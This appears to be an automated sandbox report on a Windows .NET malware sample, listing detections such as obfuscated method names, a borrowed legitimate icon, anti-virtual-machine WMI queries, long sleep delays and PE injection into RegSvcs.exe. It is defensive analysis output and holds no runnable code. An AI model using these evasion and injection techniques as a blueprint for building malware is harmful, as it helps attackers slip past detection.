Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, wub1ytjjCdfdLhJix4i.cs	High entropy of concatenated method names: 'xmeEm7sDnX', 'tXGEzRjfoy', 'GTZtqBZRTG', 'QmQtjGjl6Q', 'n40t7IpJtc', 'MLCtFRJMZX', 'am6tWuncdD', 'mGZt3MN59F', 'gq9tn5lKCK', 'w7DtpHStY2'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, c2ESVQ76N0EIECY7EL.cs	High entropy of concatenated method names: 'lDhuRAJf4', 'Rg4ll8XKd', 'QJaR86QEd', 'qYpS1O5qY', 'ieB1PM7kf', 'nF5AuABl4', 'WoG4vpm7jxY2bCrRhL', 'NtaJYUokMDpkL5od0g', 'Q64ddjFij', 'BwRE0Ymuw'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, cJVn7XgI8MTEhIeQLx.cs	High entropy of concatenated method names: 'oVo8iFtoNy', 'Vyb8PK3AmY', 'STg88bEY0i', 'SgM8tvj32L', 'fK18vIcqbN', 'Ci48r6UsjF', 'Dispose', 'P6CdnvINbw', 'Hoodp3QgCu', 'ased5rSKo2'
Source: 0.2.Z6ojPnRBp1.exe.7e40000.5.raw.unpack, xB8evT1Hy2DoeBq2Gt.cs	High entropy of concatenated method names: 'Rwv5lrD25P', 'ix35ROYvYV', 'Atk5cK9HRq', 'kyo514KDBW', 'hkK5io7NXJ', 'UbY5Bs7V4e', 'NPa5PgkdEU', 'C8O5dbbrDx', 'p2U58Exhgp', 'jlK5ErsWsQ'

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (29).png

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Z6ojPnRBp1.exe PID: 7556, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory allocated: 7FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory allocated: 8FE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1862			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6896			Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe TID: 7576

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.1421551007.0000000001061000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA0008	Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Users\user\Desktop\Z6ojPnRBp1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Z6ojPnRBp1.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
